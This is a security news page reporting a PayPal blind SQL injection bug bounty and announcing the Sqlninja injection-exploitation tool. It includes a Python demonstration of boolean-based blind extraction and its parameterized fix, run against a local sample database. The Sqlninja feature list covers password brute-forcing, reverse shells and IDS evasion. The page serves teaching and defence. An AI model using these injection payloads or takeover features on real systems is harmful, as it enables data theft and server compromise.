October 24, 2014

PayPal fixes a SQL injection vulnerability, pays researcher $3,000 reward for discovery

(LiveHacking.Com) – PayPal has paid out $3,000 in reward money to a security researcher who found and reported an SQL injection vulnerability. The payout, made under PayPal’s bug bounty program, went to researchers at Vulnerability Laboratory who discovered a blind SQL injection vulnerability in the official PayPal website.

According to an advisory sent to the Full Disclosure security mailing list, the vulnerability allows remote attackers to inject SQL commands into the DBMS behind the affected application. The vulnerability is located in the Confirm Email module, in the bound and vulnerable id input field.

The injected SQL command is executed when the Confirm Email module reloads the page. Because the injection is blind, the attacker learns nothing from the response other than whether the page rendered normally, and has to infer data from that true/false signal one query at a time. A normal, low-privileged PayPal user account is all that is required to exploit the vulnerability.

Although the posting included a proof of concept, PayPal fixed the underlying problem within a very short time of the vulnerability being reported. The advisory is dated 12th January 2013, and there is no evidence that the vulnerability was ever exploited in the wild.
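To make the mechanism concrete, here is an added example of a blind, boolean-based injection in an e-mail confirmation lookup, beside the parameterized fix. It is constructed for this article against an in-memory SQLite database; it is not PayPal's code, and the table name, column names, token values and the hypothetical confirm_email_* handlers are all assumptions. The only feedback the "attacker" gets is whether a row came back, which is exactly the one-bit oracle a blind injection leaves behind.

```python
import sqlite3

# Constructed sample data standing in for an e-mail confirmation table.
SAMPLE_ROWS = [
    (1, "alice@example.com", "s3cr3t-token-alice"),
    (2, "bob@example.com", "t0ken-bob"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE email_confirmations (id INTEGER PRIMARY KEY, email TEXT, token TEXT)"
    )
    db.executemany("INSERT INTO email_confirmations VALUES (?, ?, ?)", SAMPLE_ROWS)
    return db


def confirm_email_vulnerable(db, user_id):
    """Hypothetical vulnerable handler: the 'id' request parameter is spliced
    straight into the SQL text, so anything after the number is parsed as SQL."""
    sql = "SELECT email FROM email_confirmations WHERE id = " + user_id
    row = db.execute(sql).fetchone()
    return row is not None  # page shows the confirmation or an error: one bit


def confirm_email_fixed(db, user_id):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    row = db.execute(
        "SELECT email FROM email_confirmations WHERE id = ?", (user_id,)
    ).fetchone()
    return row is not None


def extract_token_blind(oracle, row_id, max_len=32):
    """Recover another row's token one character at a time using only the
    true/false answer of the page. A linear scan over a small alphabet keeps
    the logic obvious; a real attack would binary-search on unicode()."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            payload = (
                f"{row_id} AND substr((SELECT token FROM email_confirmations "
                f"WHERE id={row_id}),{pos},1)='{ch}'"
            )
            if oracle(payload):
                found = ch
                break
        if found is None:
            break  # no character matched: we are past the end of the token
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", confirm_email_vulnerable(db, "999 OR 1=1"))
    print("fixed, tautology:     ", confirm_email_fixed(db, "999 OR 1=1"))
    print("blind extraction:", extract_token_blind(lambda p: confirm_email_vulnerable(db, p), 1))
    print("against the fix:  ", repr(extract_token_blind(lambda p: confirm_email_fixed(db, p), 1)))
```

Against the fixed handler the same payloads return False, because SQLite compares the INTEGER column with the literal text "999 OR 1=1" rather than evaluating it, and the extraction loop gives up on the first character. The defensive lesson is the usual one: bind every user-supplied value, including ones the application "knows" are numeric, and treat any page whose behaviour differs between a true and a false condition as a usable oracle.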

Reward schemes for finding security-related bugs have become common in the industry, with companies like Google and Facebook paying out substantial rewards for verifiable vulnerabilities in their software. Google recently announced its third Pwnium competition, Pwnium 3, which will focus on Chrome OS. The search giant is making available up to $3.14159 million USD in rewards for demonstrable attacks against a base (WiFi) model of the Samsung Series 5 550 Chromebook running the latest stable version of Chrome OS.

Since PayPal handles millions of dollars of transactions per day, this extra level of help from ethical hackers matters; as you can imagine, however, the company does not publicize the vulnerabilities that are found.

Sqlninja 0.2.5 Released

Sqlninja 0.2.5 has been released. Sqlninja is a tool for exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back end. According to its project website, its main goal is to provide remote access to the vulnerable DB server, even in a very hostile environment. It is meant to be used by penetration testers to help automate the process of taking over a DB server once a SQL injection vulnerability has been discovered.

Sqlninja Features:

  • Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
  • Bruteforce of ‘sa’ password (in 2 flavors: dictionary-based and incremental)
  • Privilege escalation to sysadmin group if ‘sa’ password has been found
  • Creation of a custom xp_cmdshell if the original one has been removed
  • Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
  • TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
  • Direct and reverse bindshell, both TCP and UDP
  • DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
  • Evasion techniques to confuse a few IDS/IPS/WAF
  • Integration with Metasploit 3, to obtain graphical access to the remote DB server through a VNC server injection
  • Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping

Requirements:

In order to use sqlninja, the following Perl modules need to be present:

  • NetPacket
  • Net-Pcap
  • Net-DNS
  • Net-RawIP
  • IO-Socket-SSL

You will also need the Metasploit Framework 3 on your box to use the metasploit attack mode, and also a VNC client if you use the VNC payload.

More Information & download links:

  1. Demo Video
  2. Project Documentation
  3. Download Page

Source:[http://sqlninja.sourceforge.net/]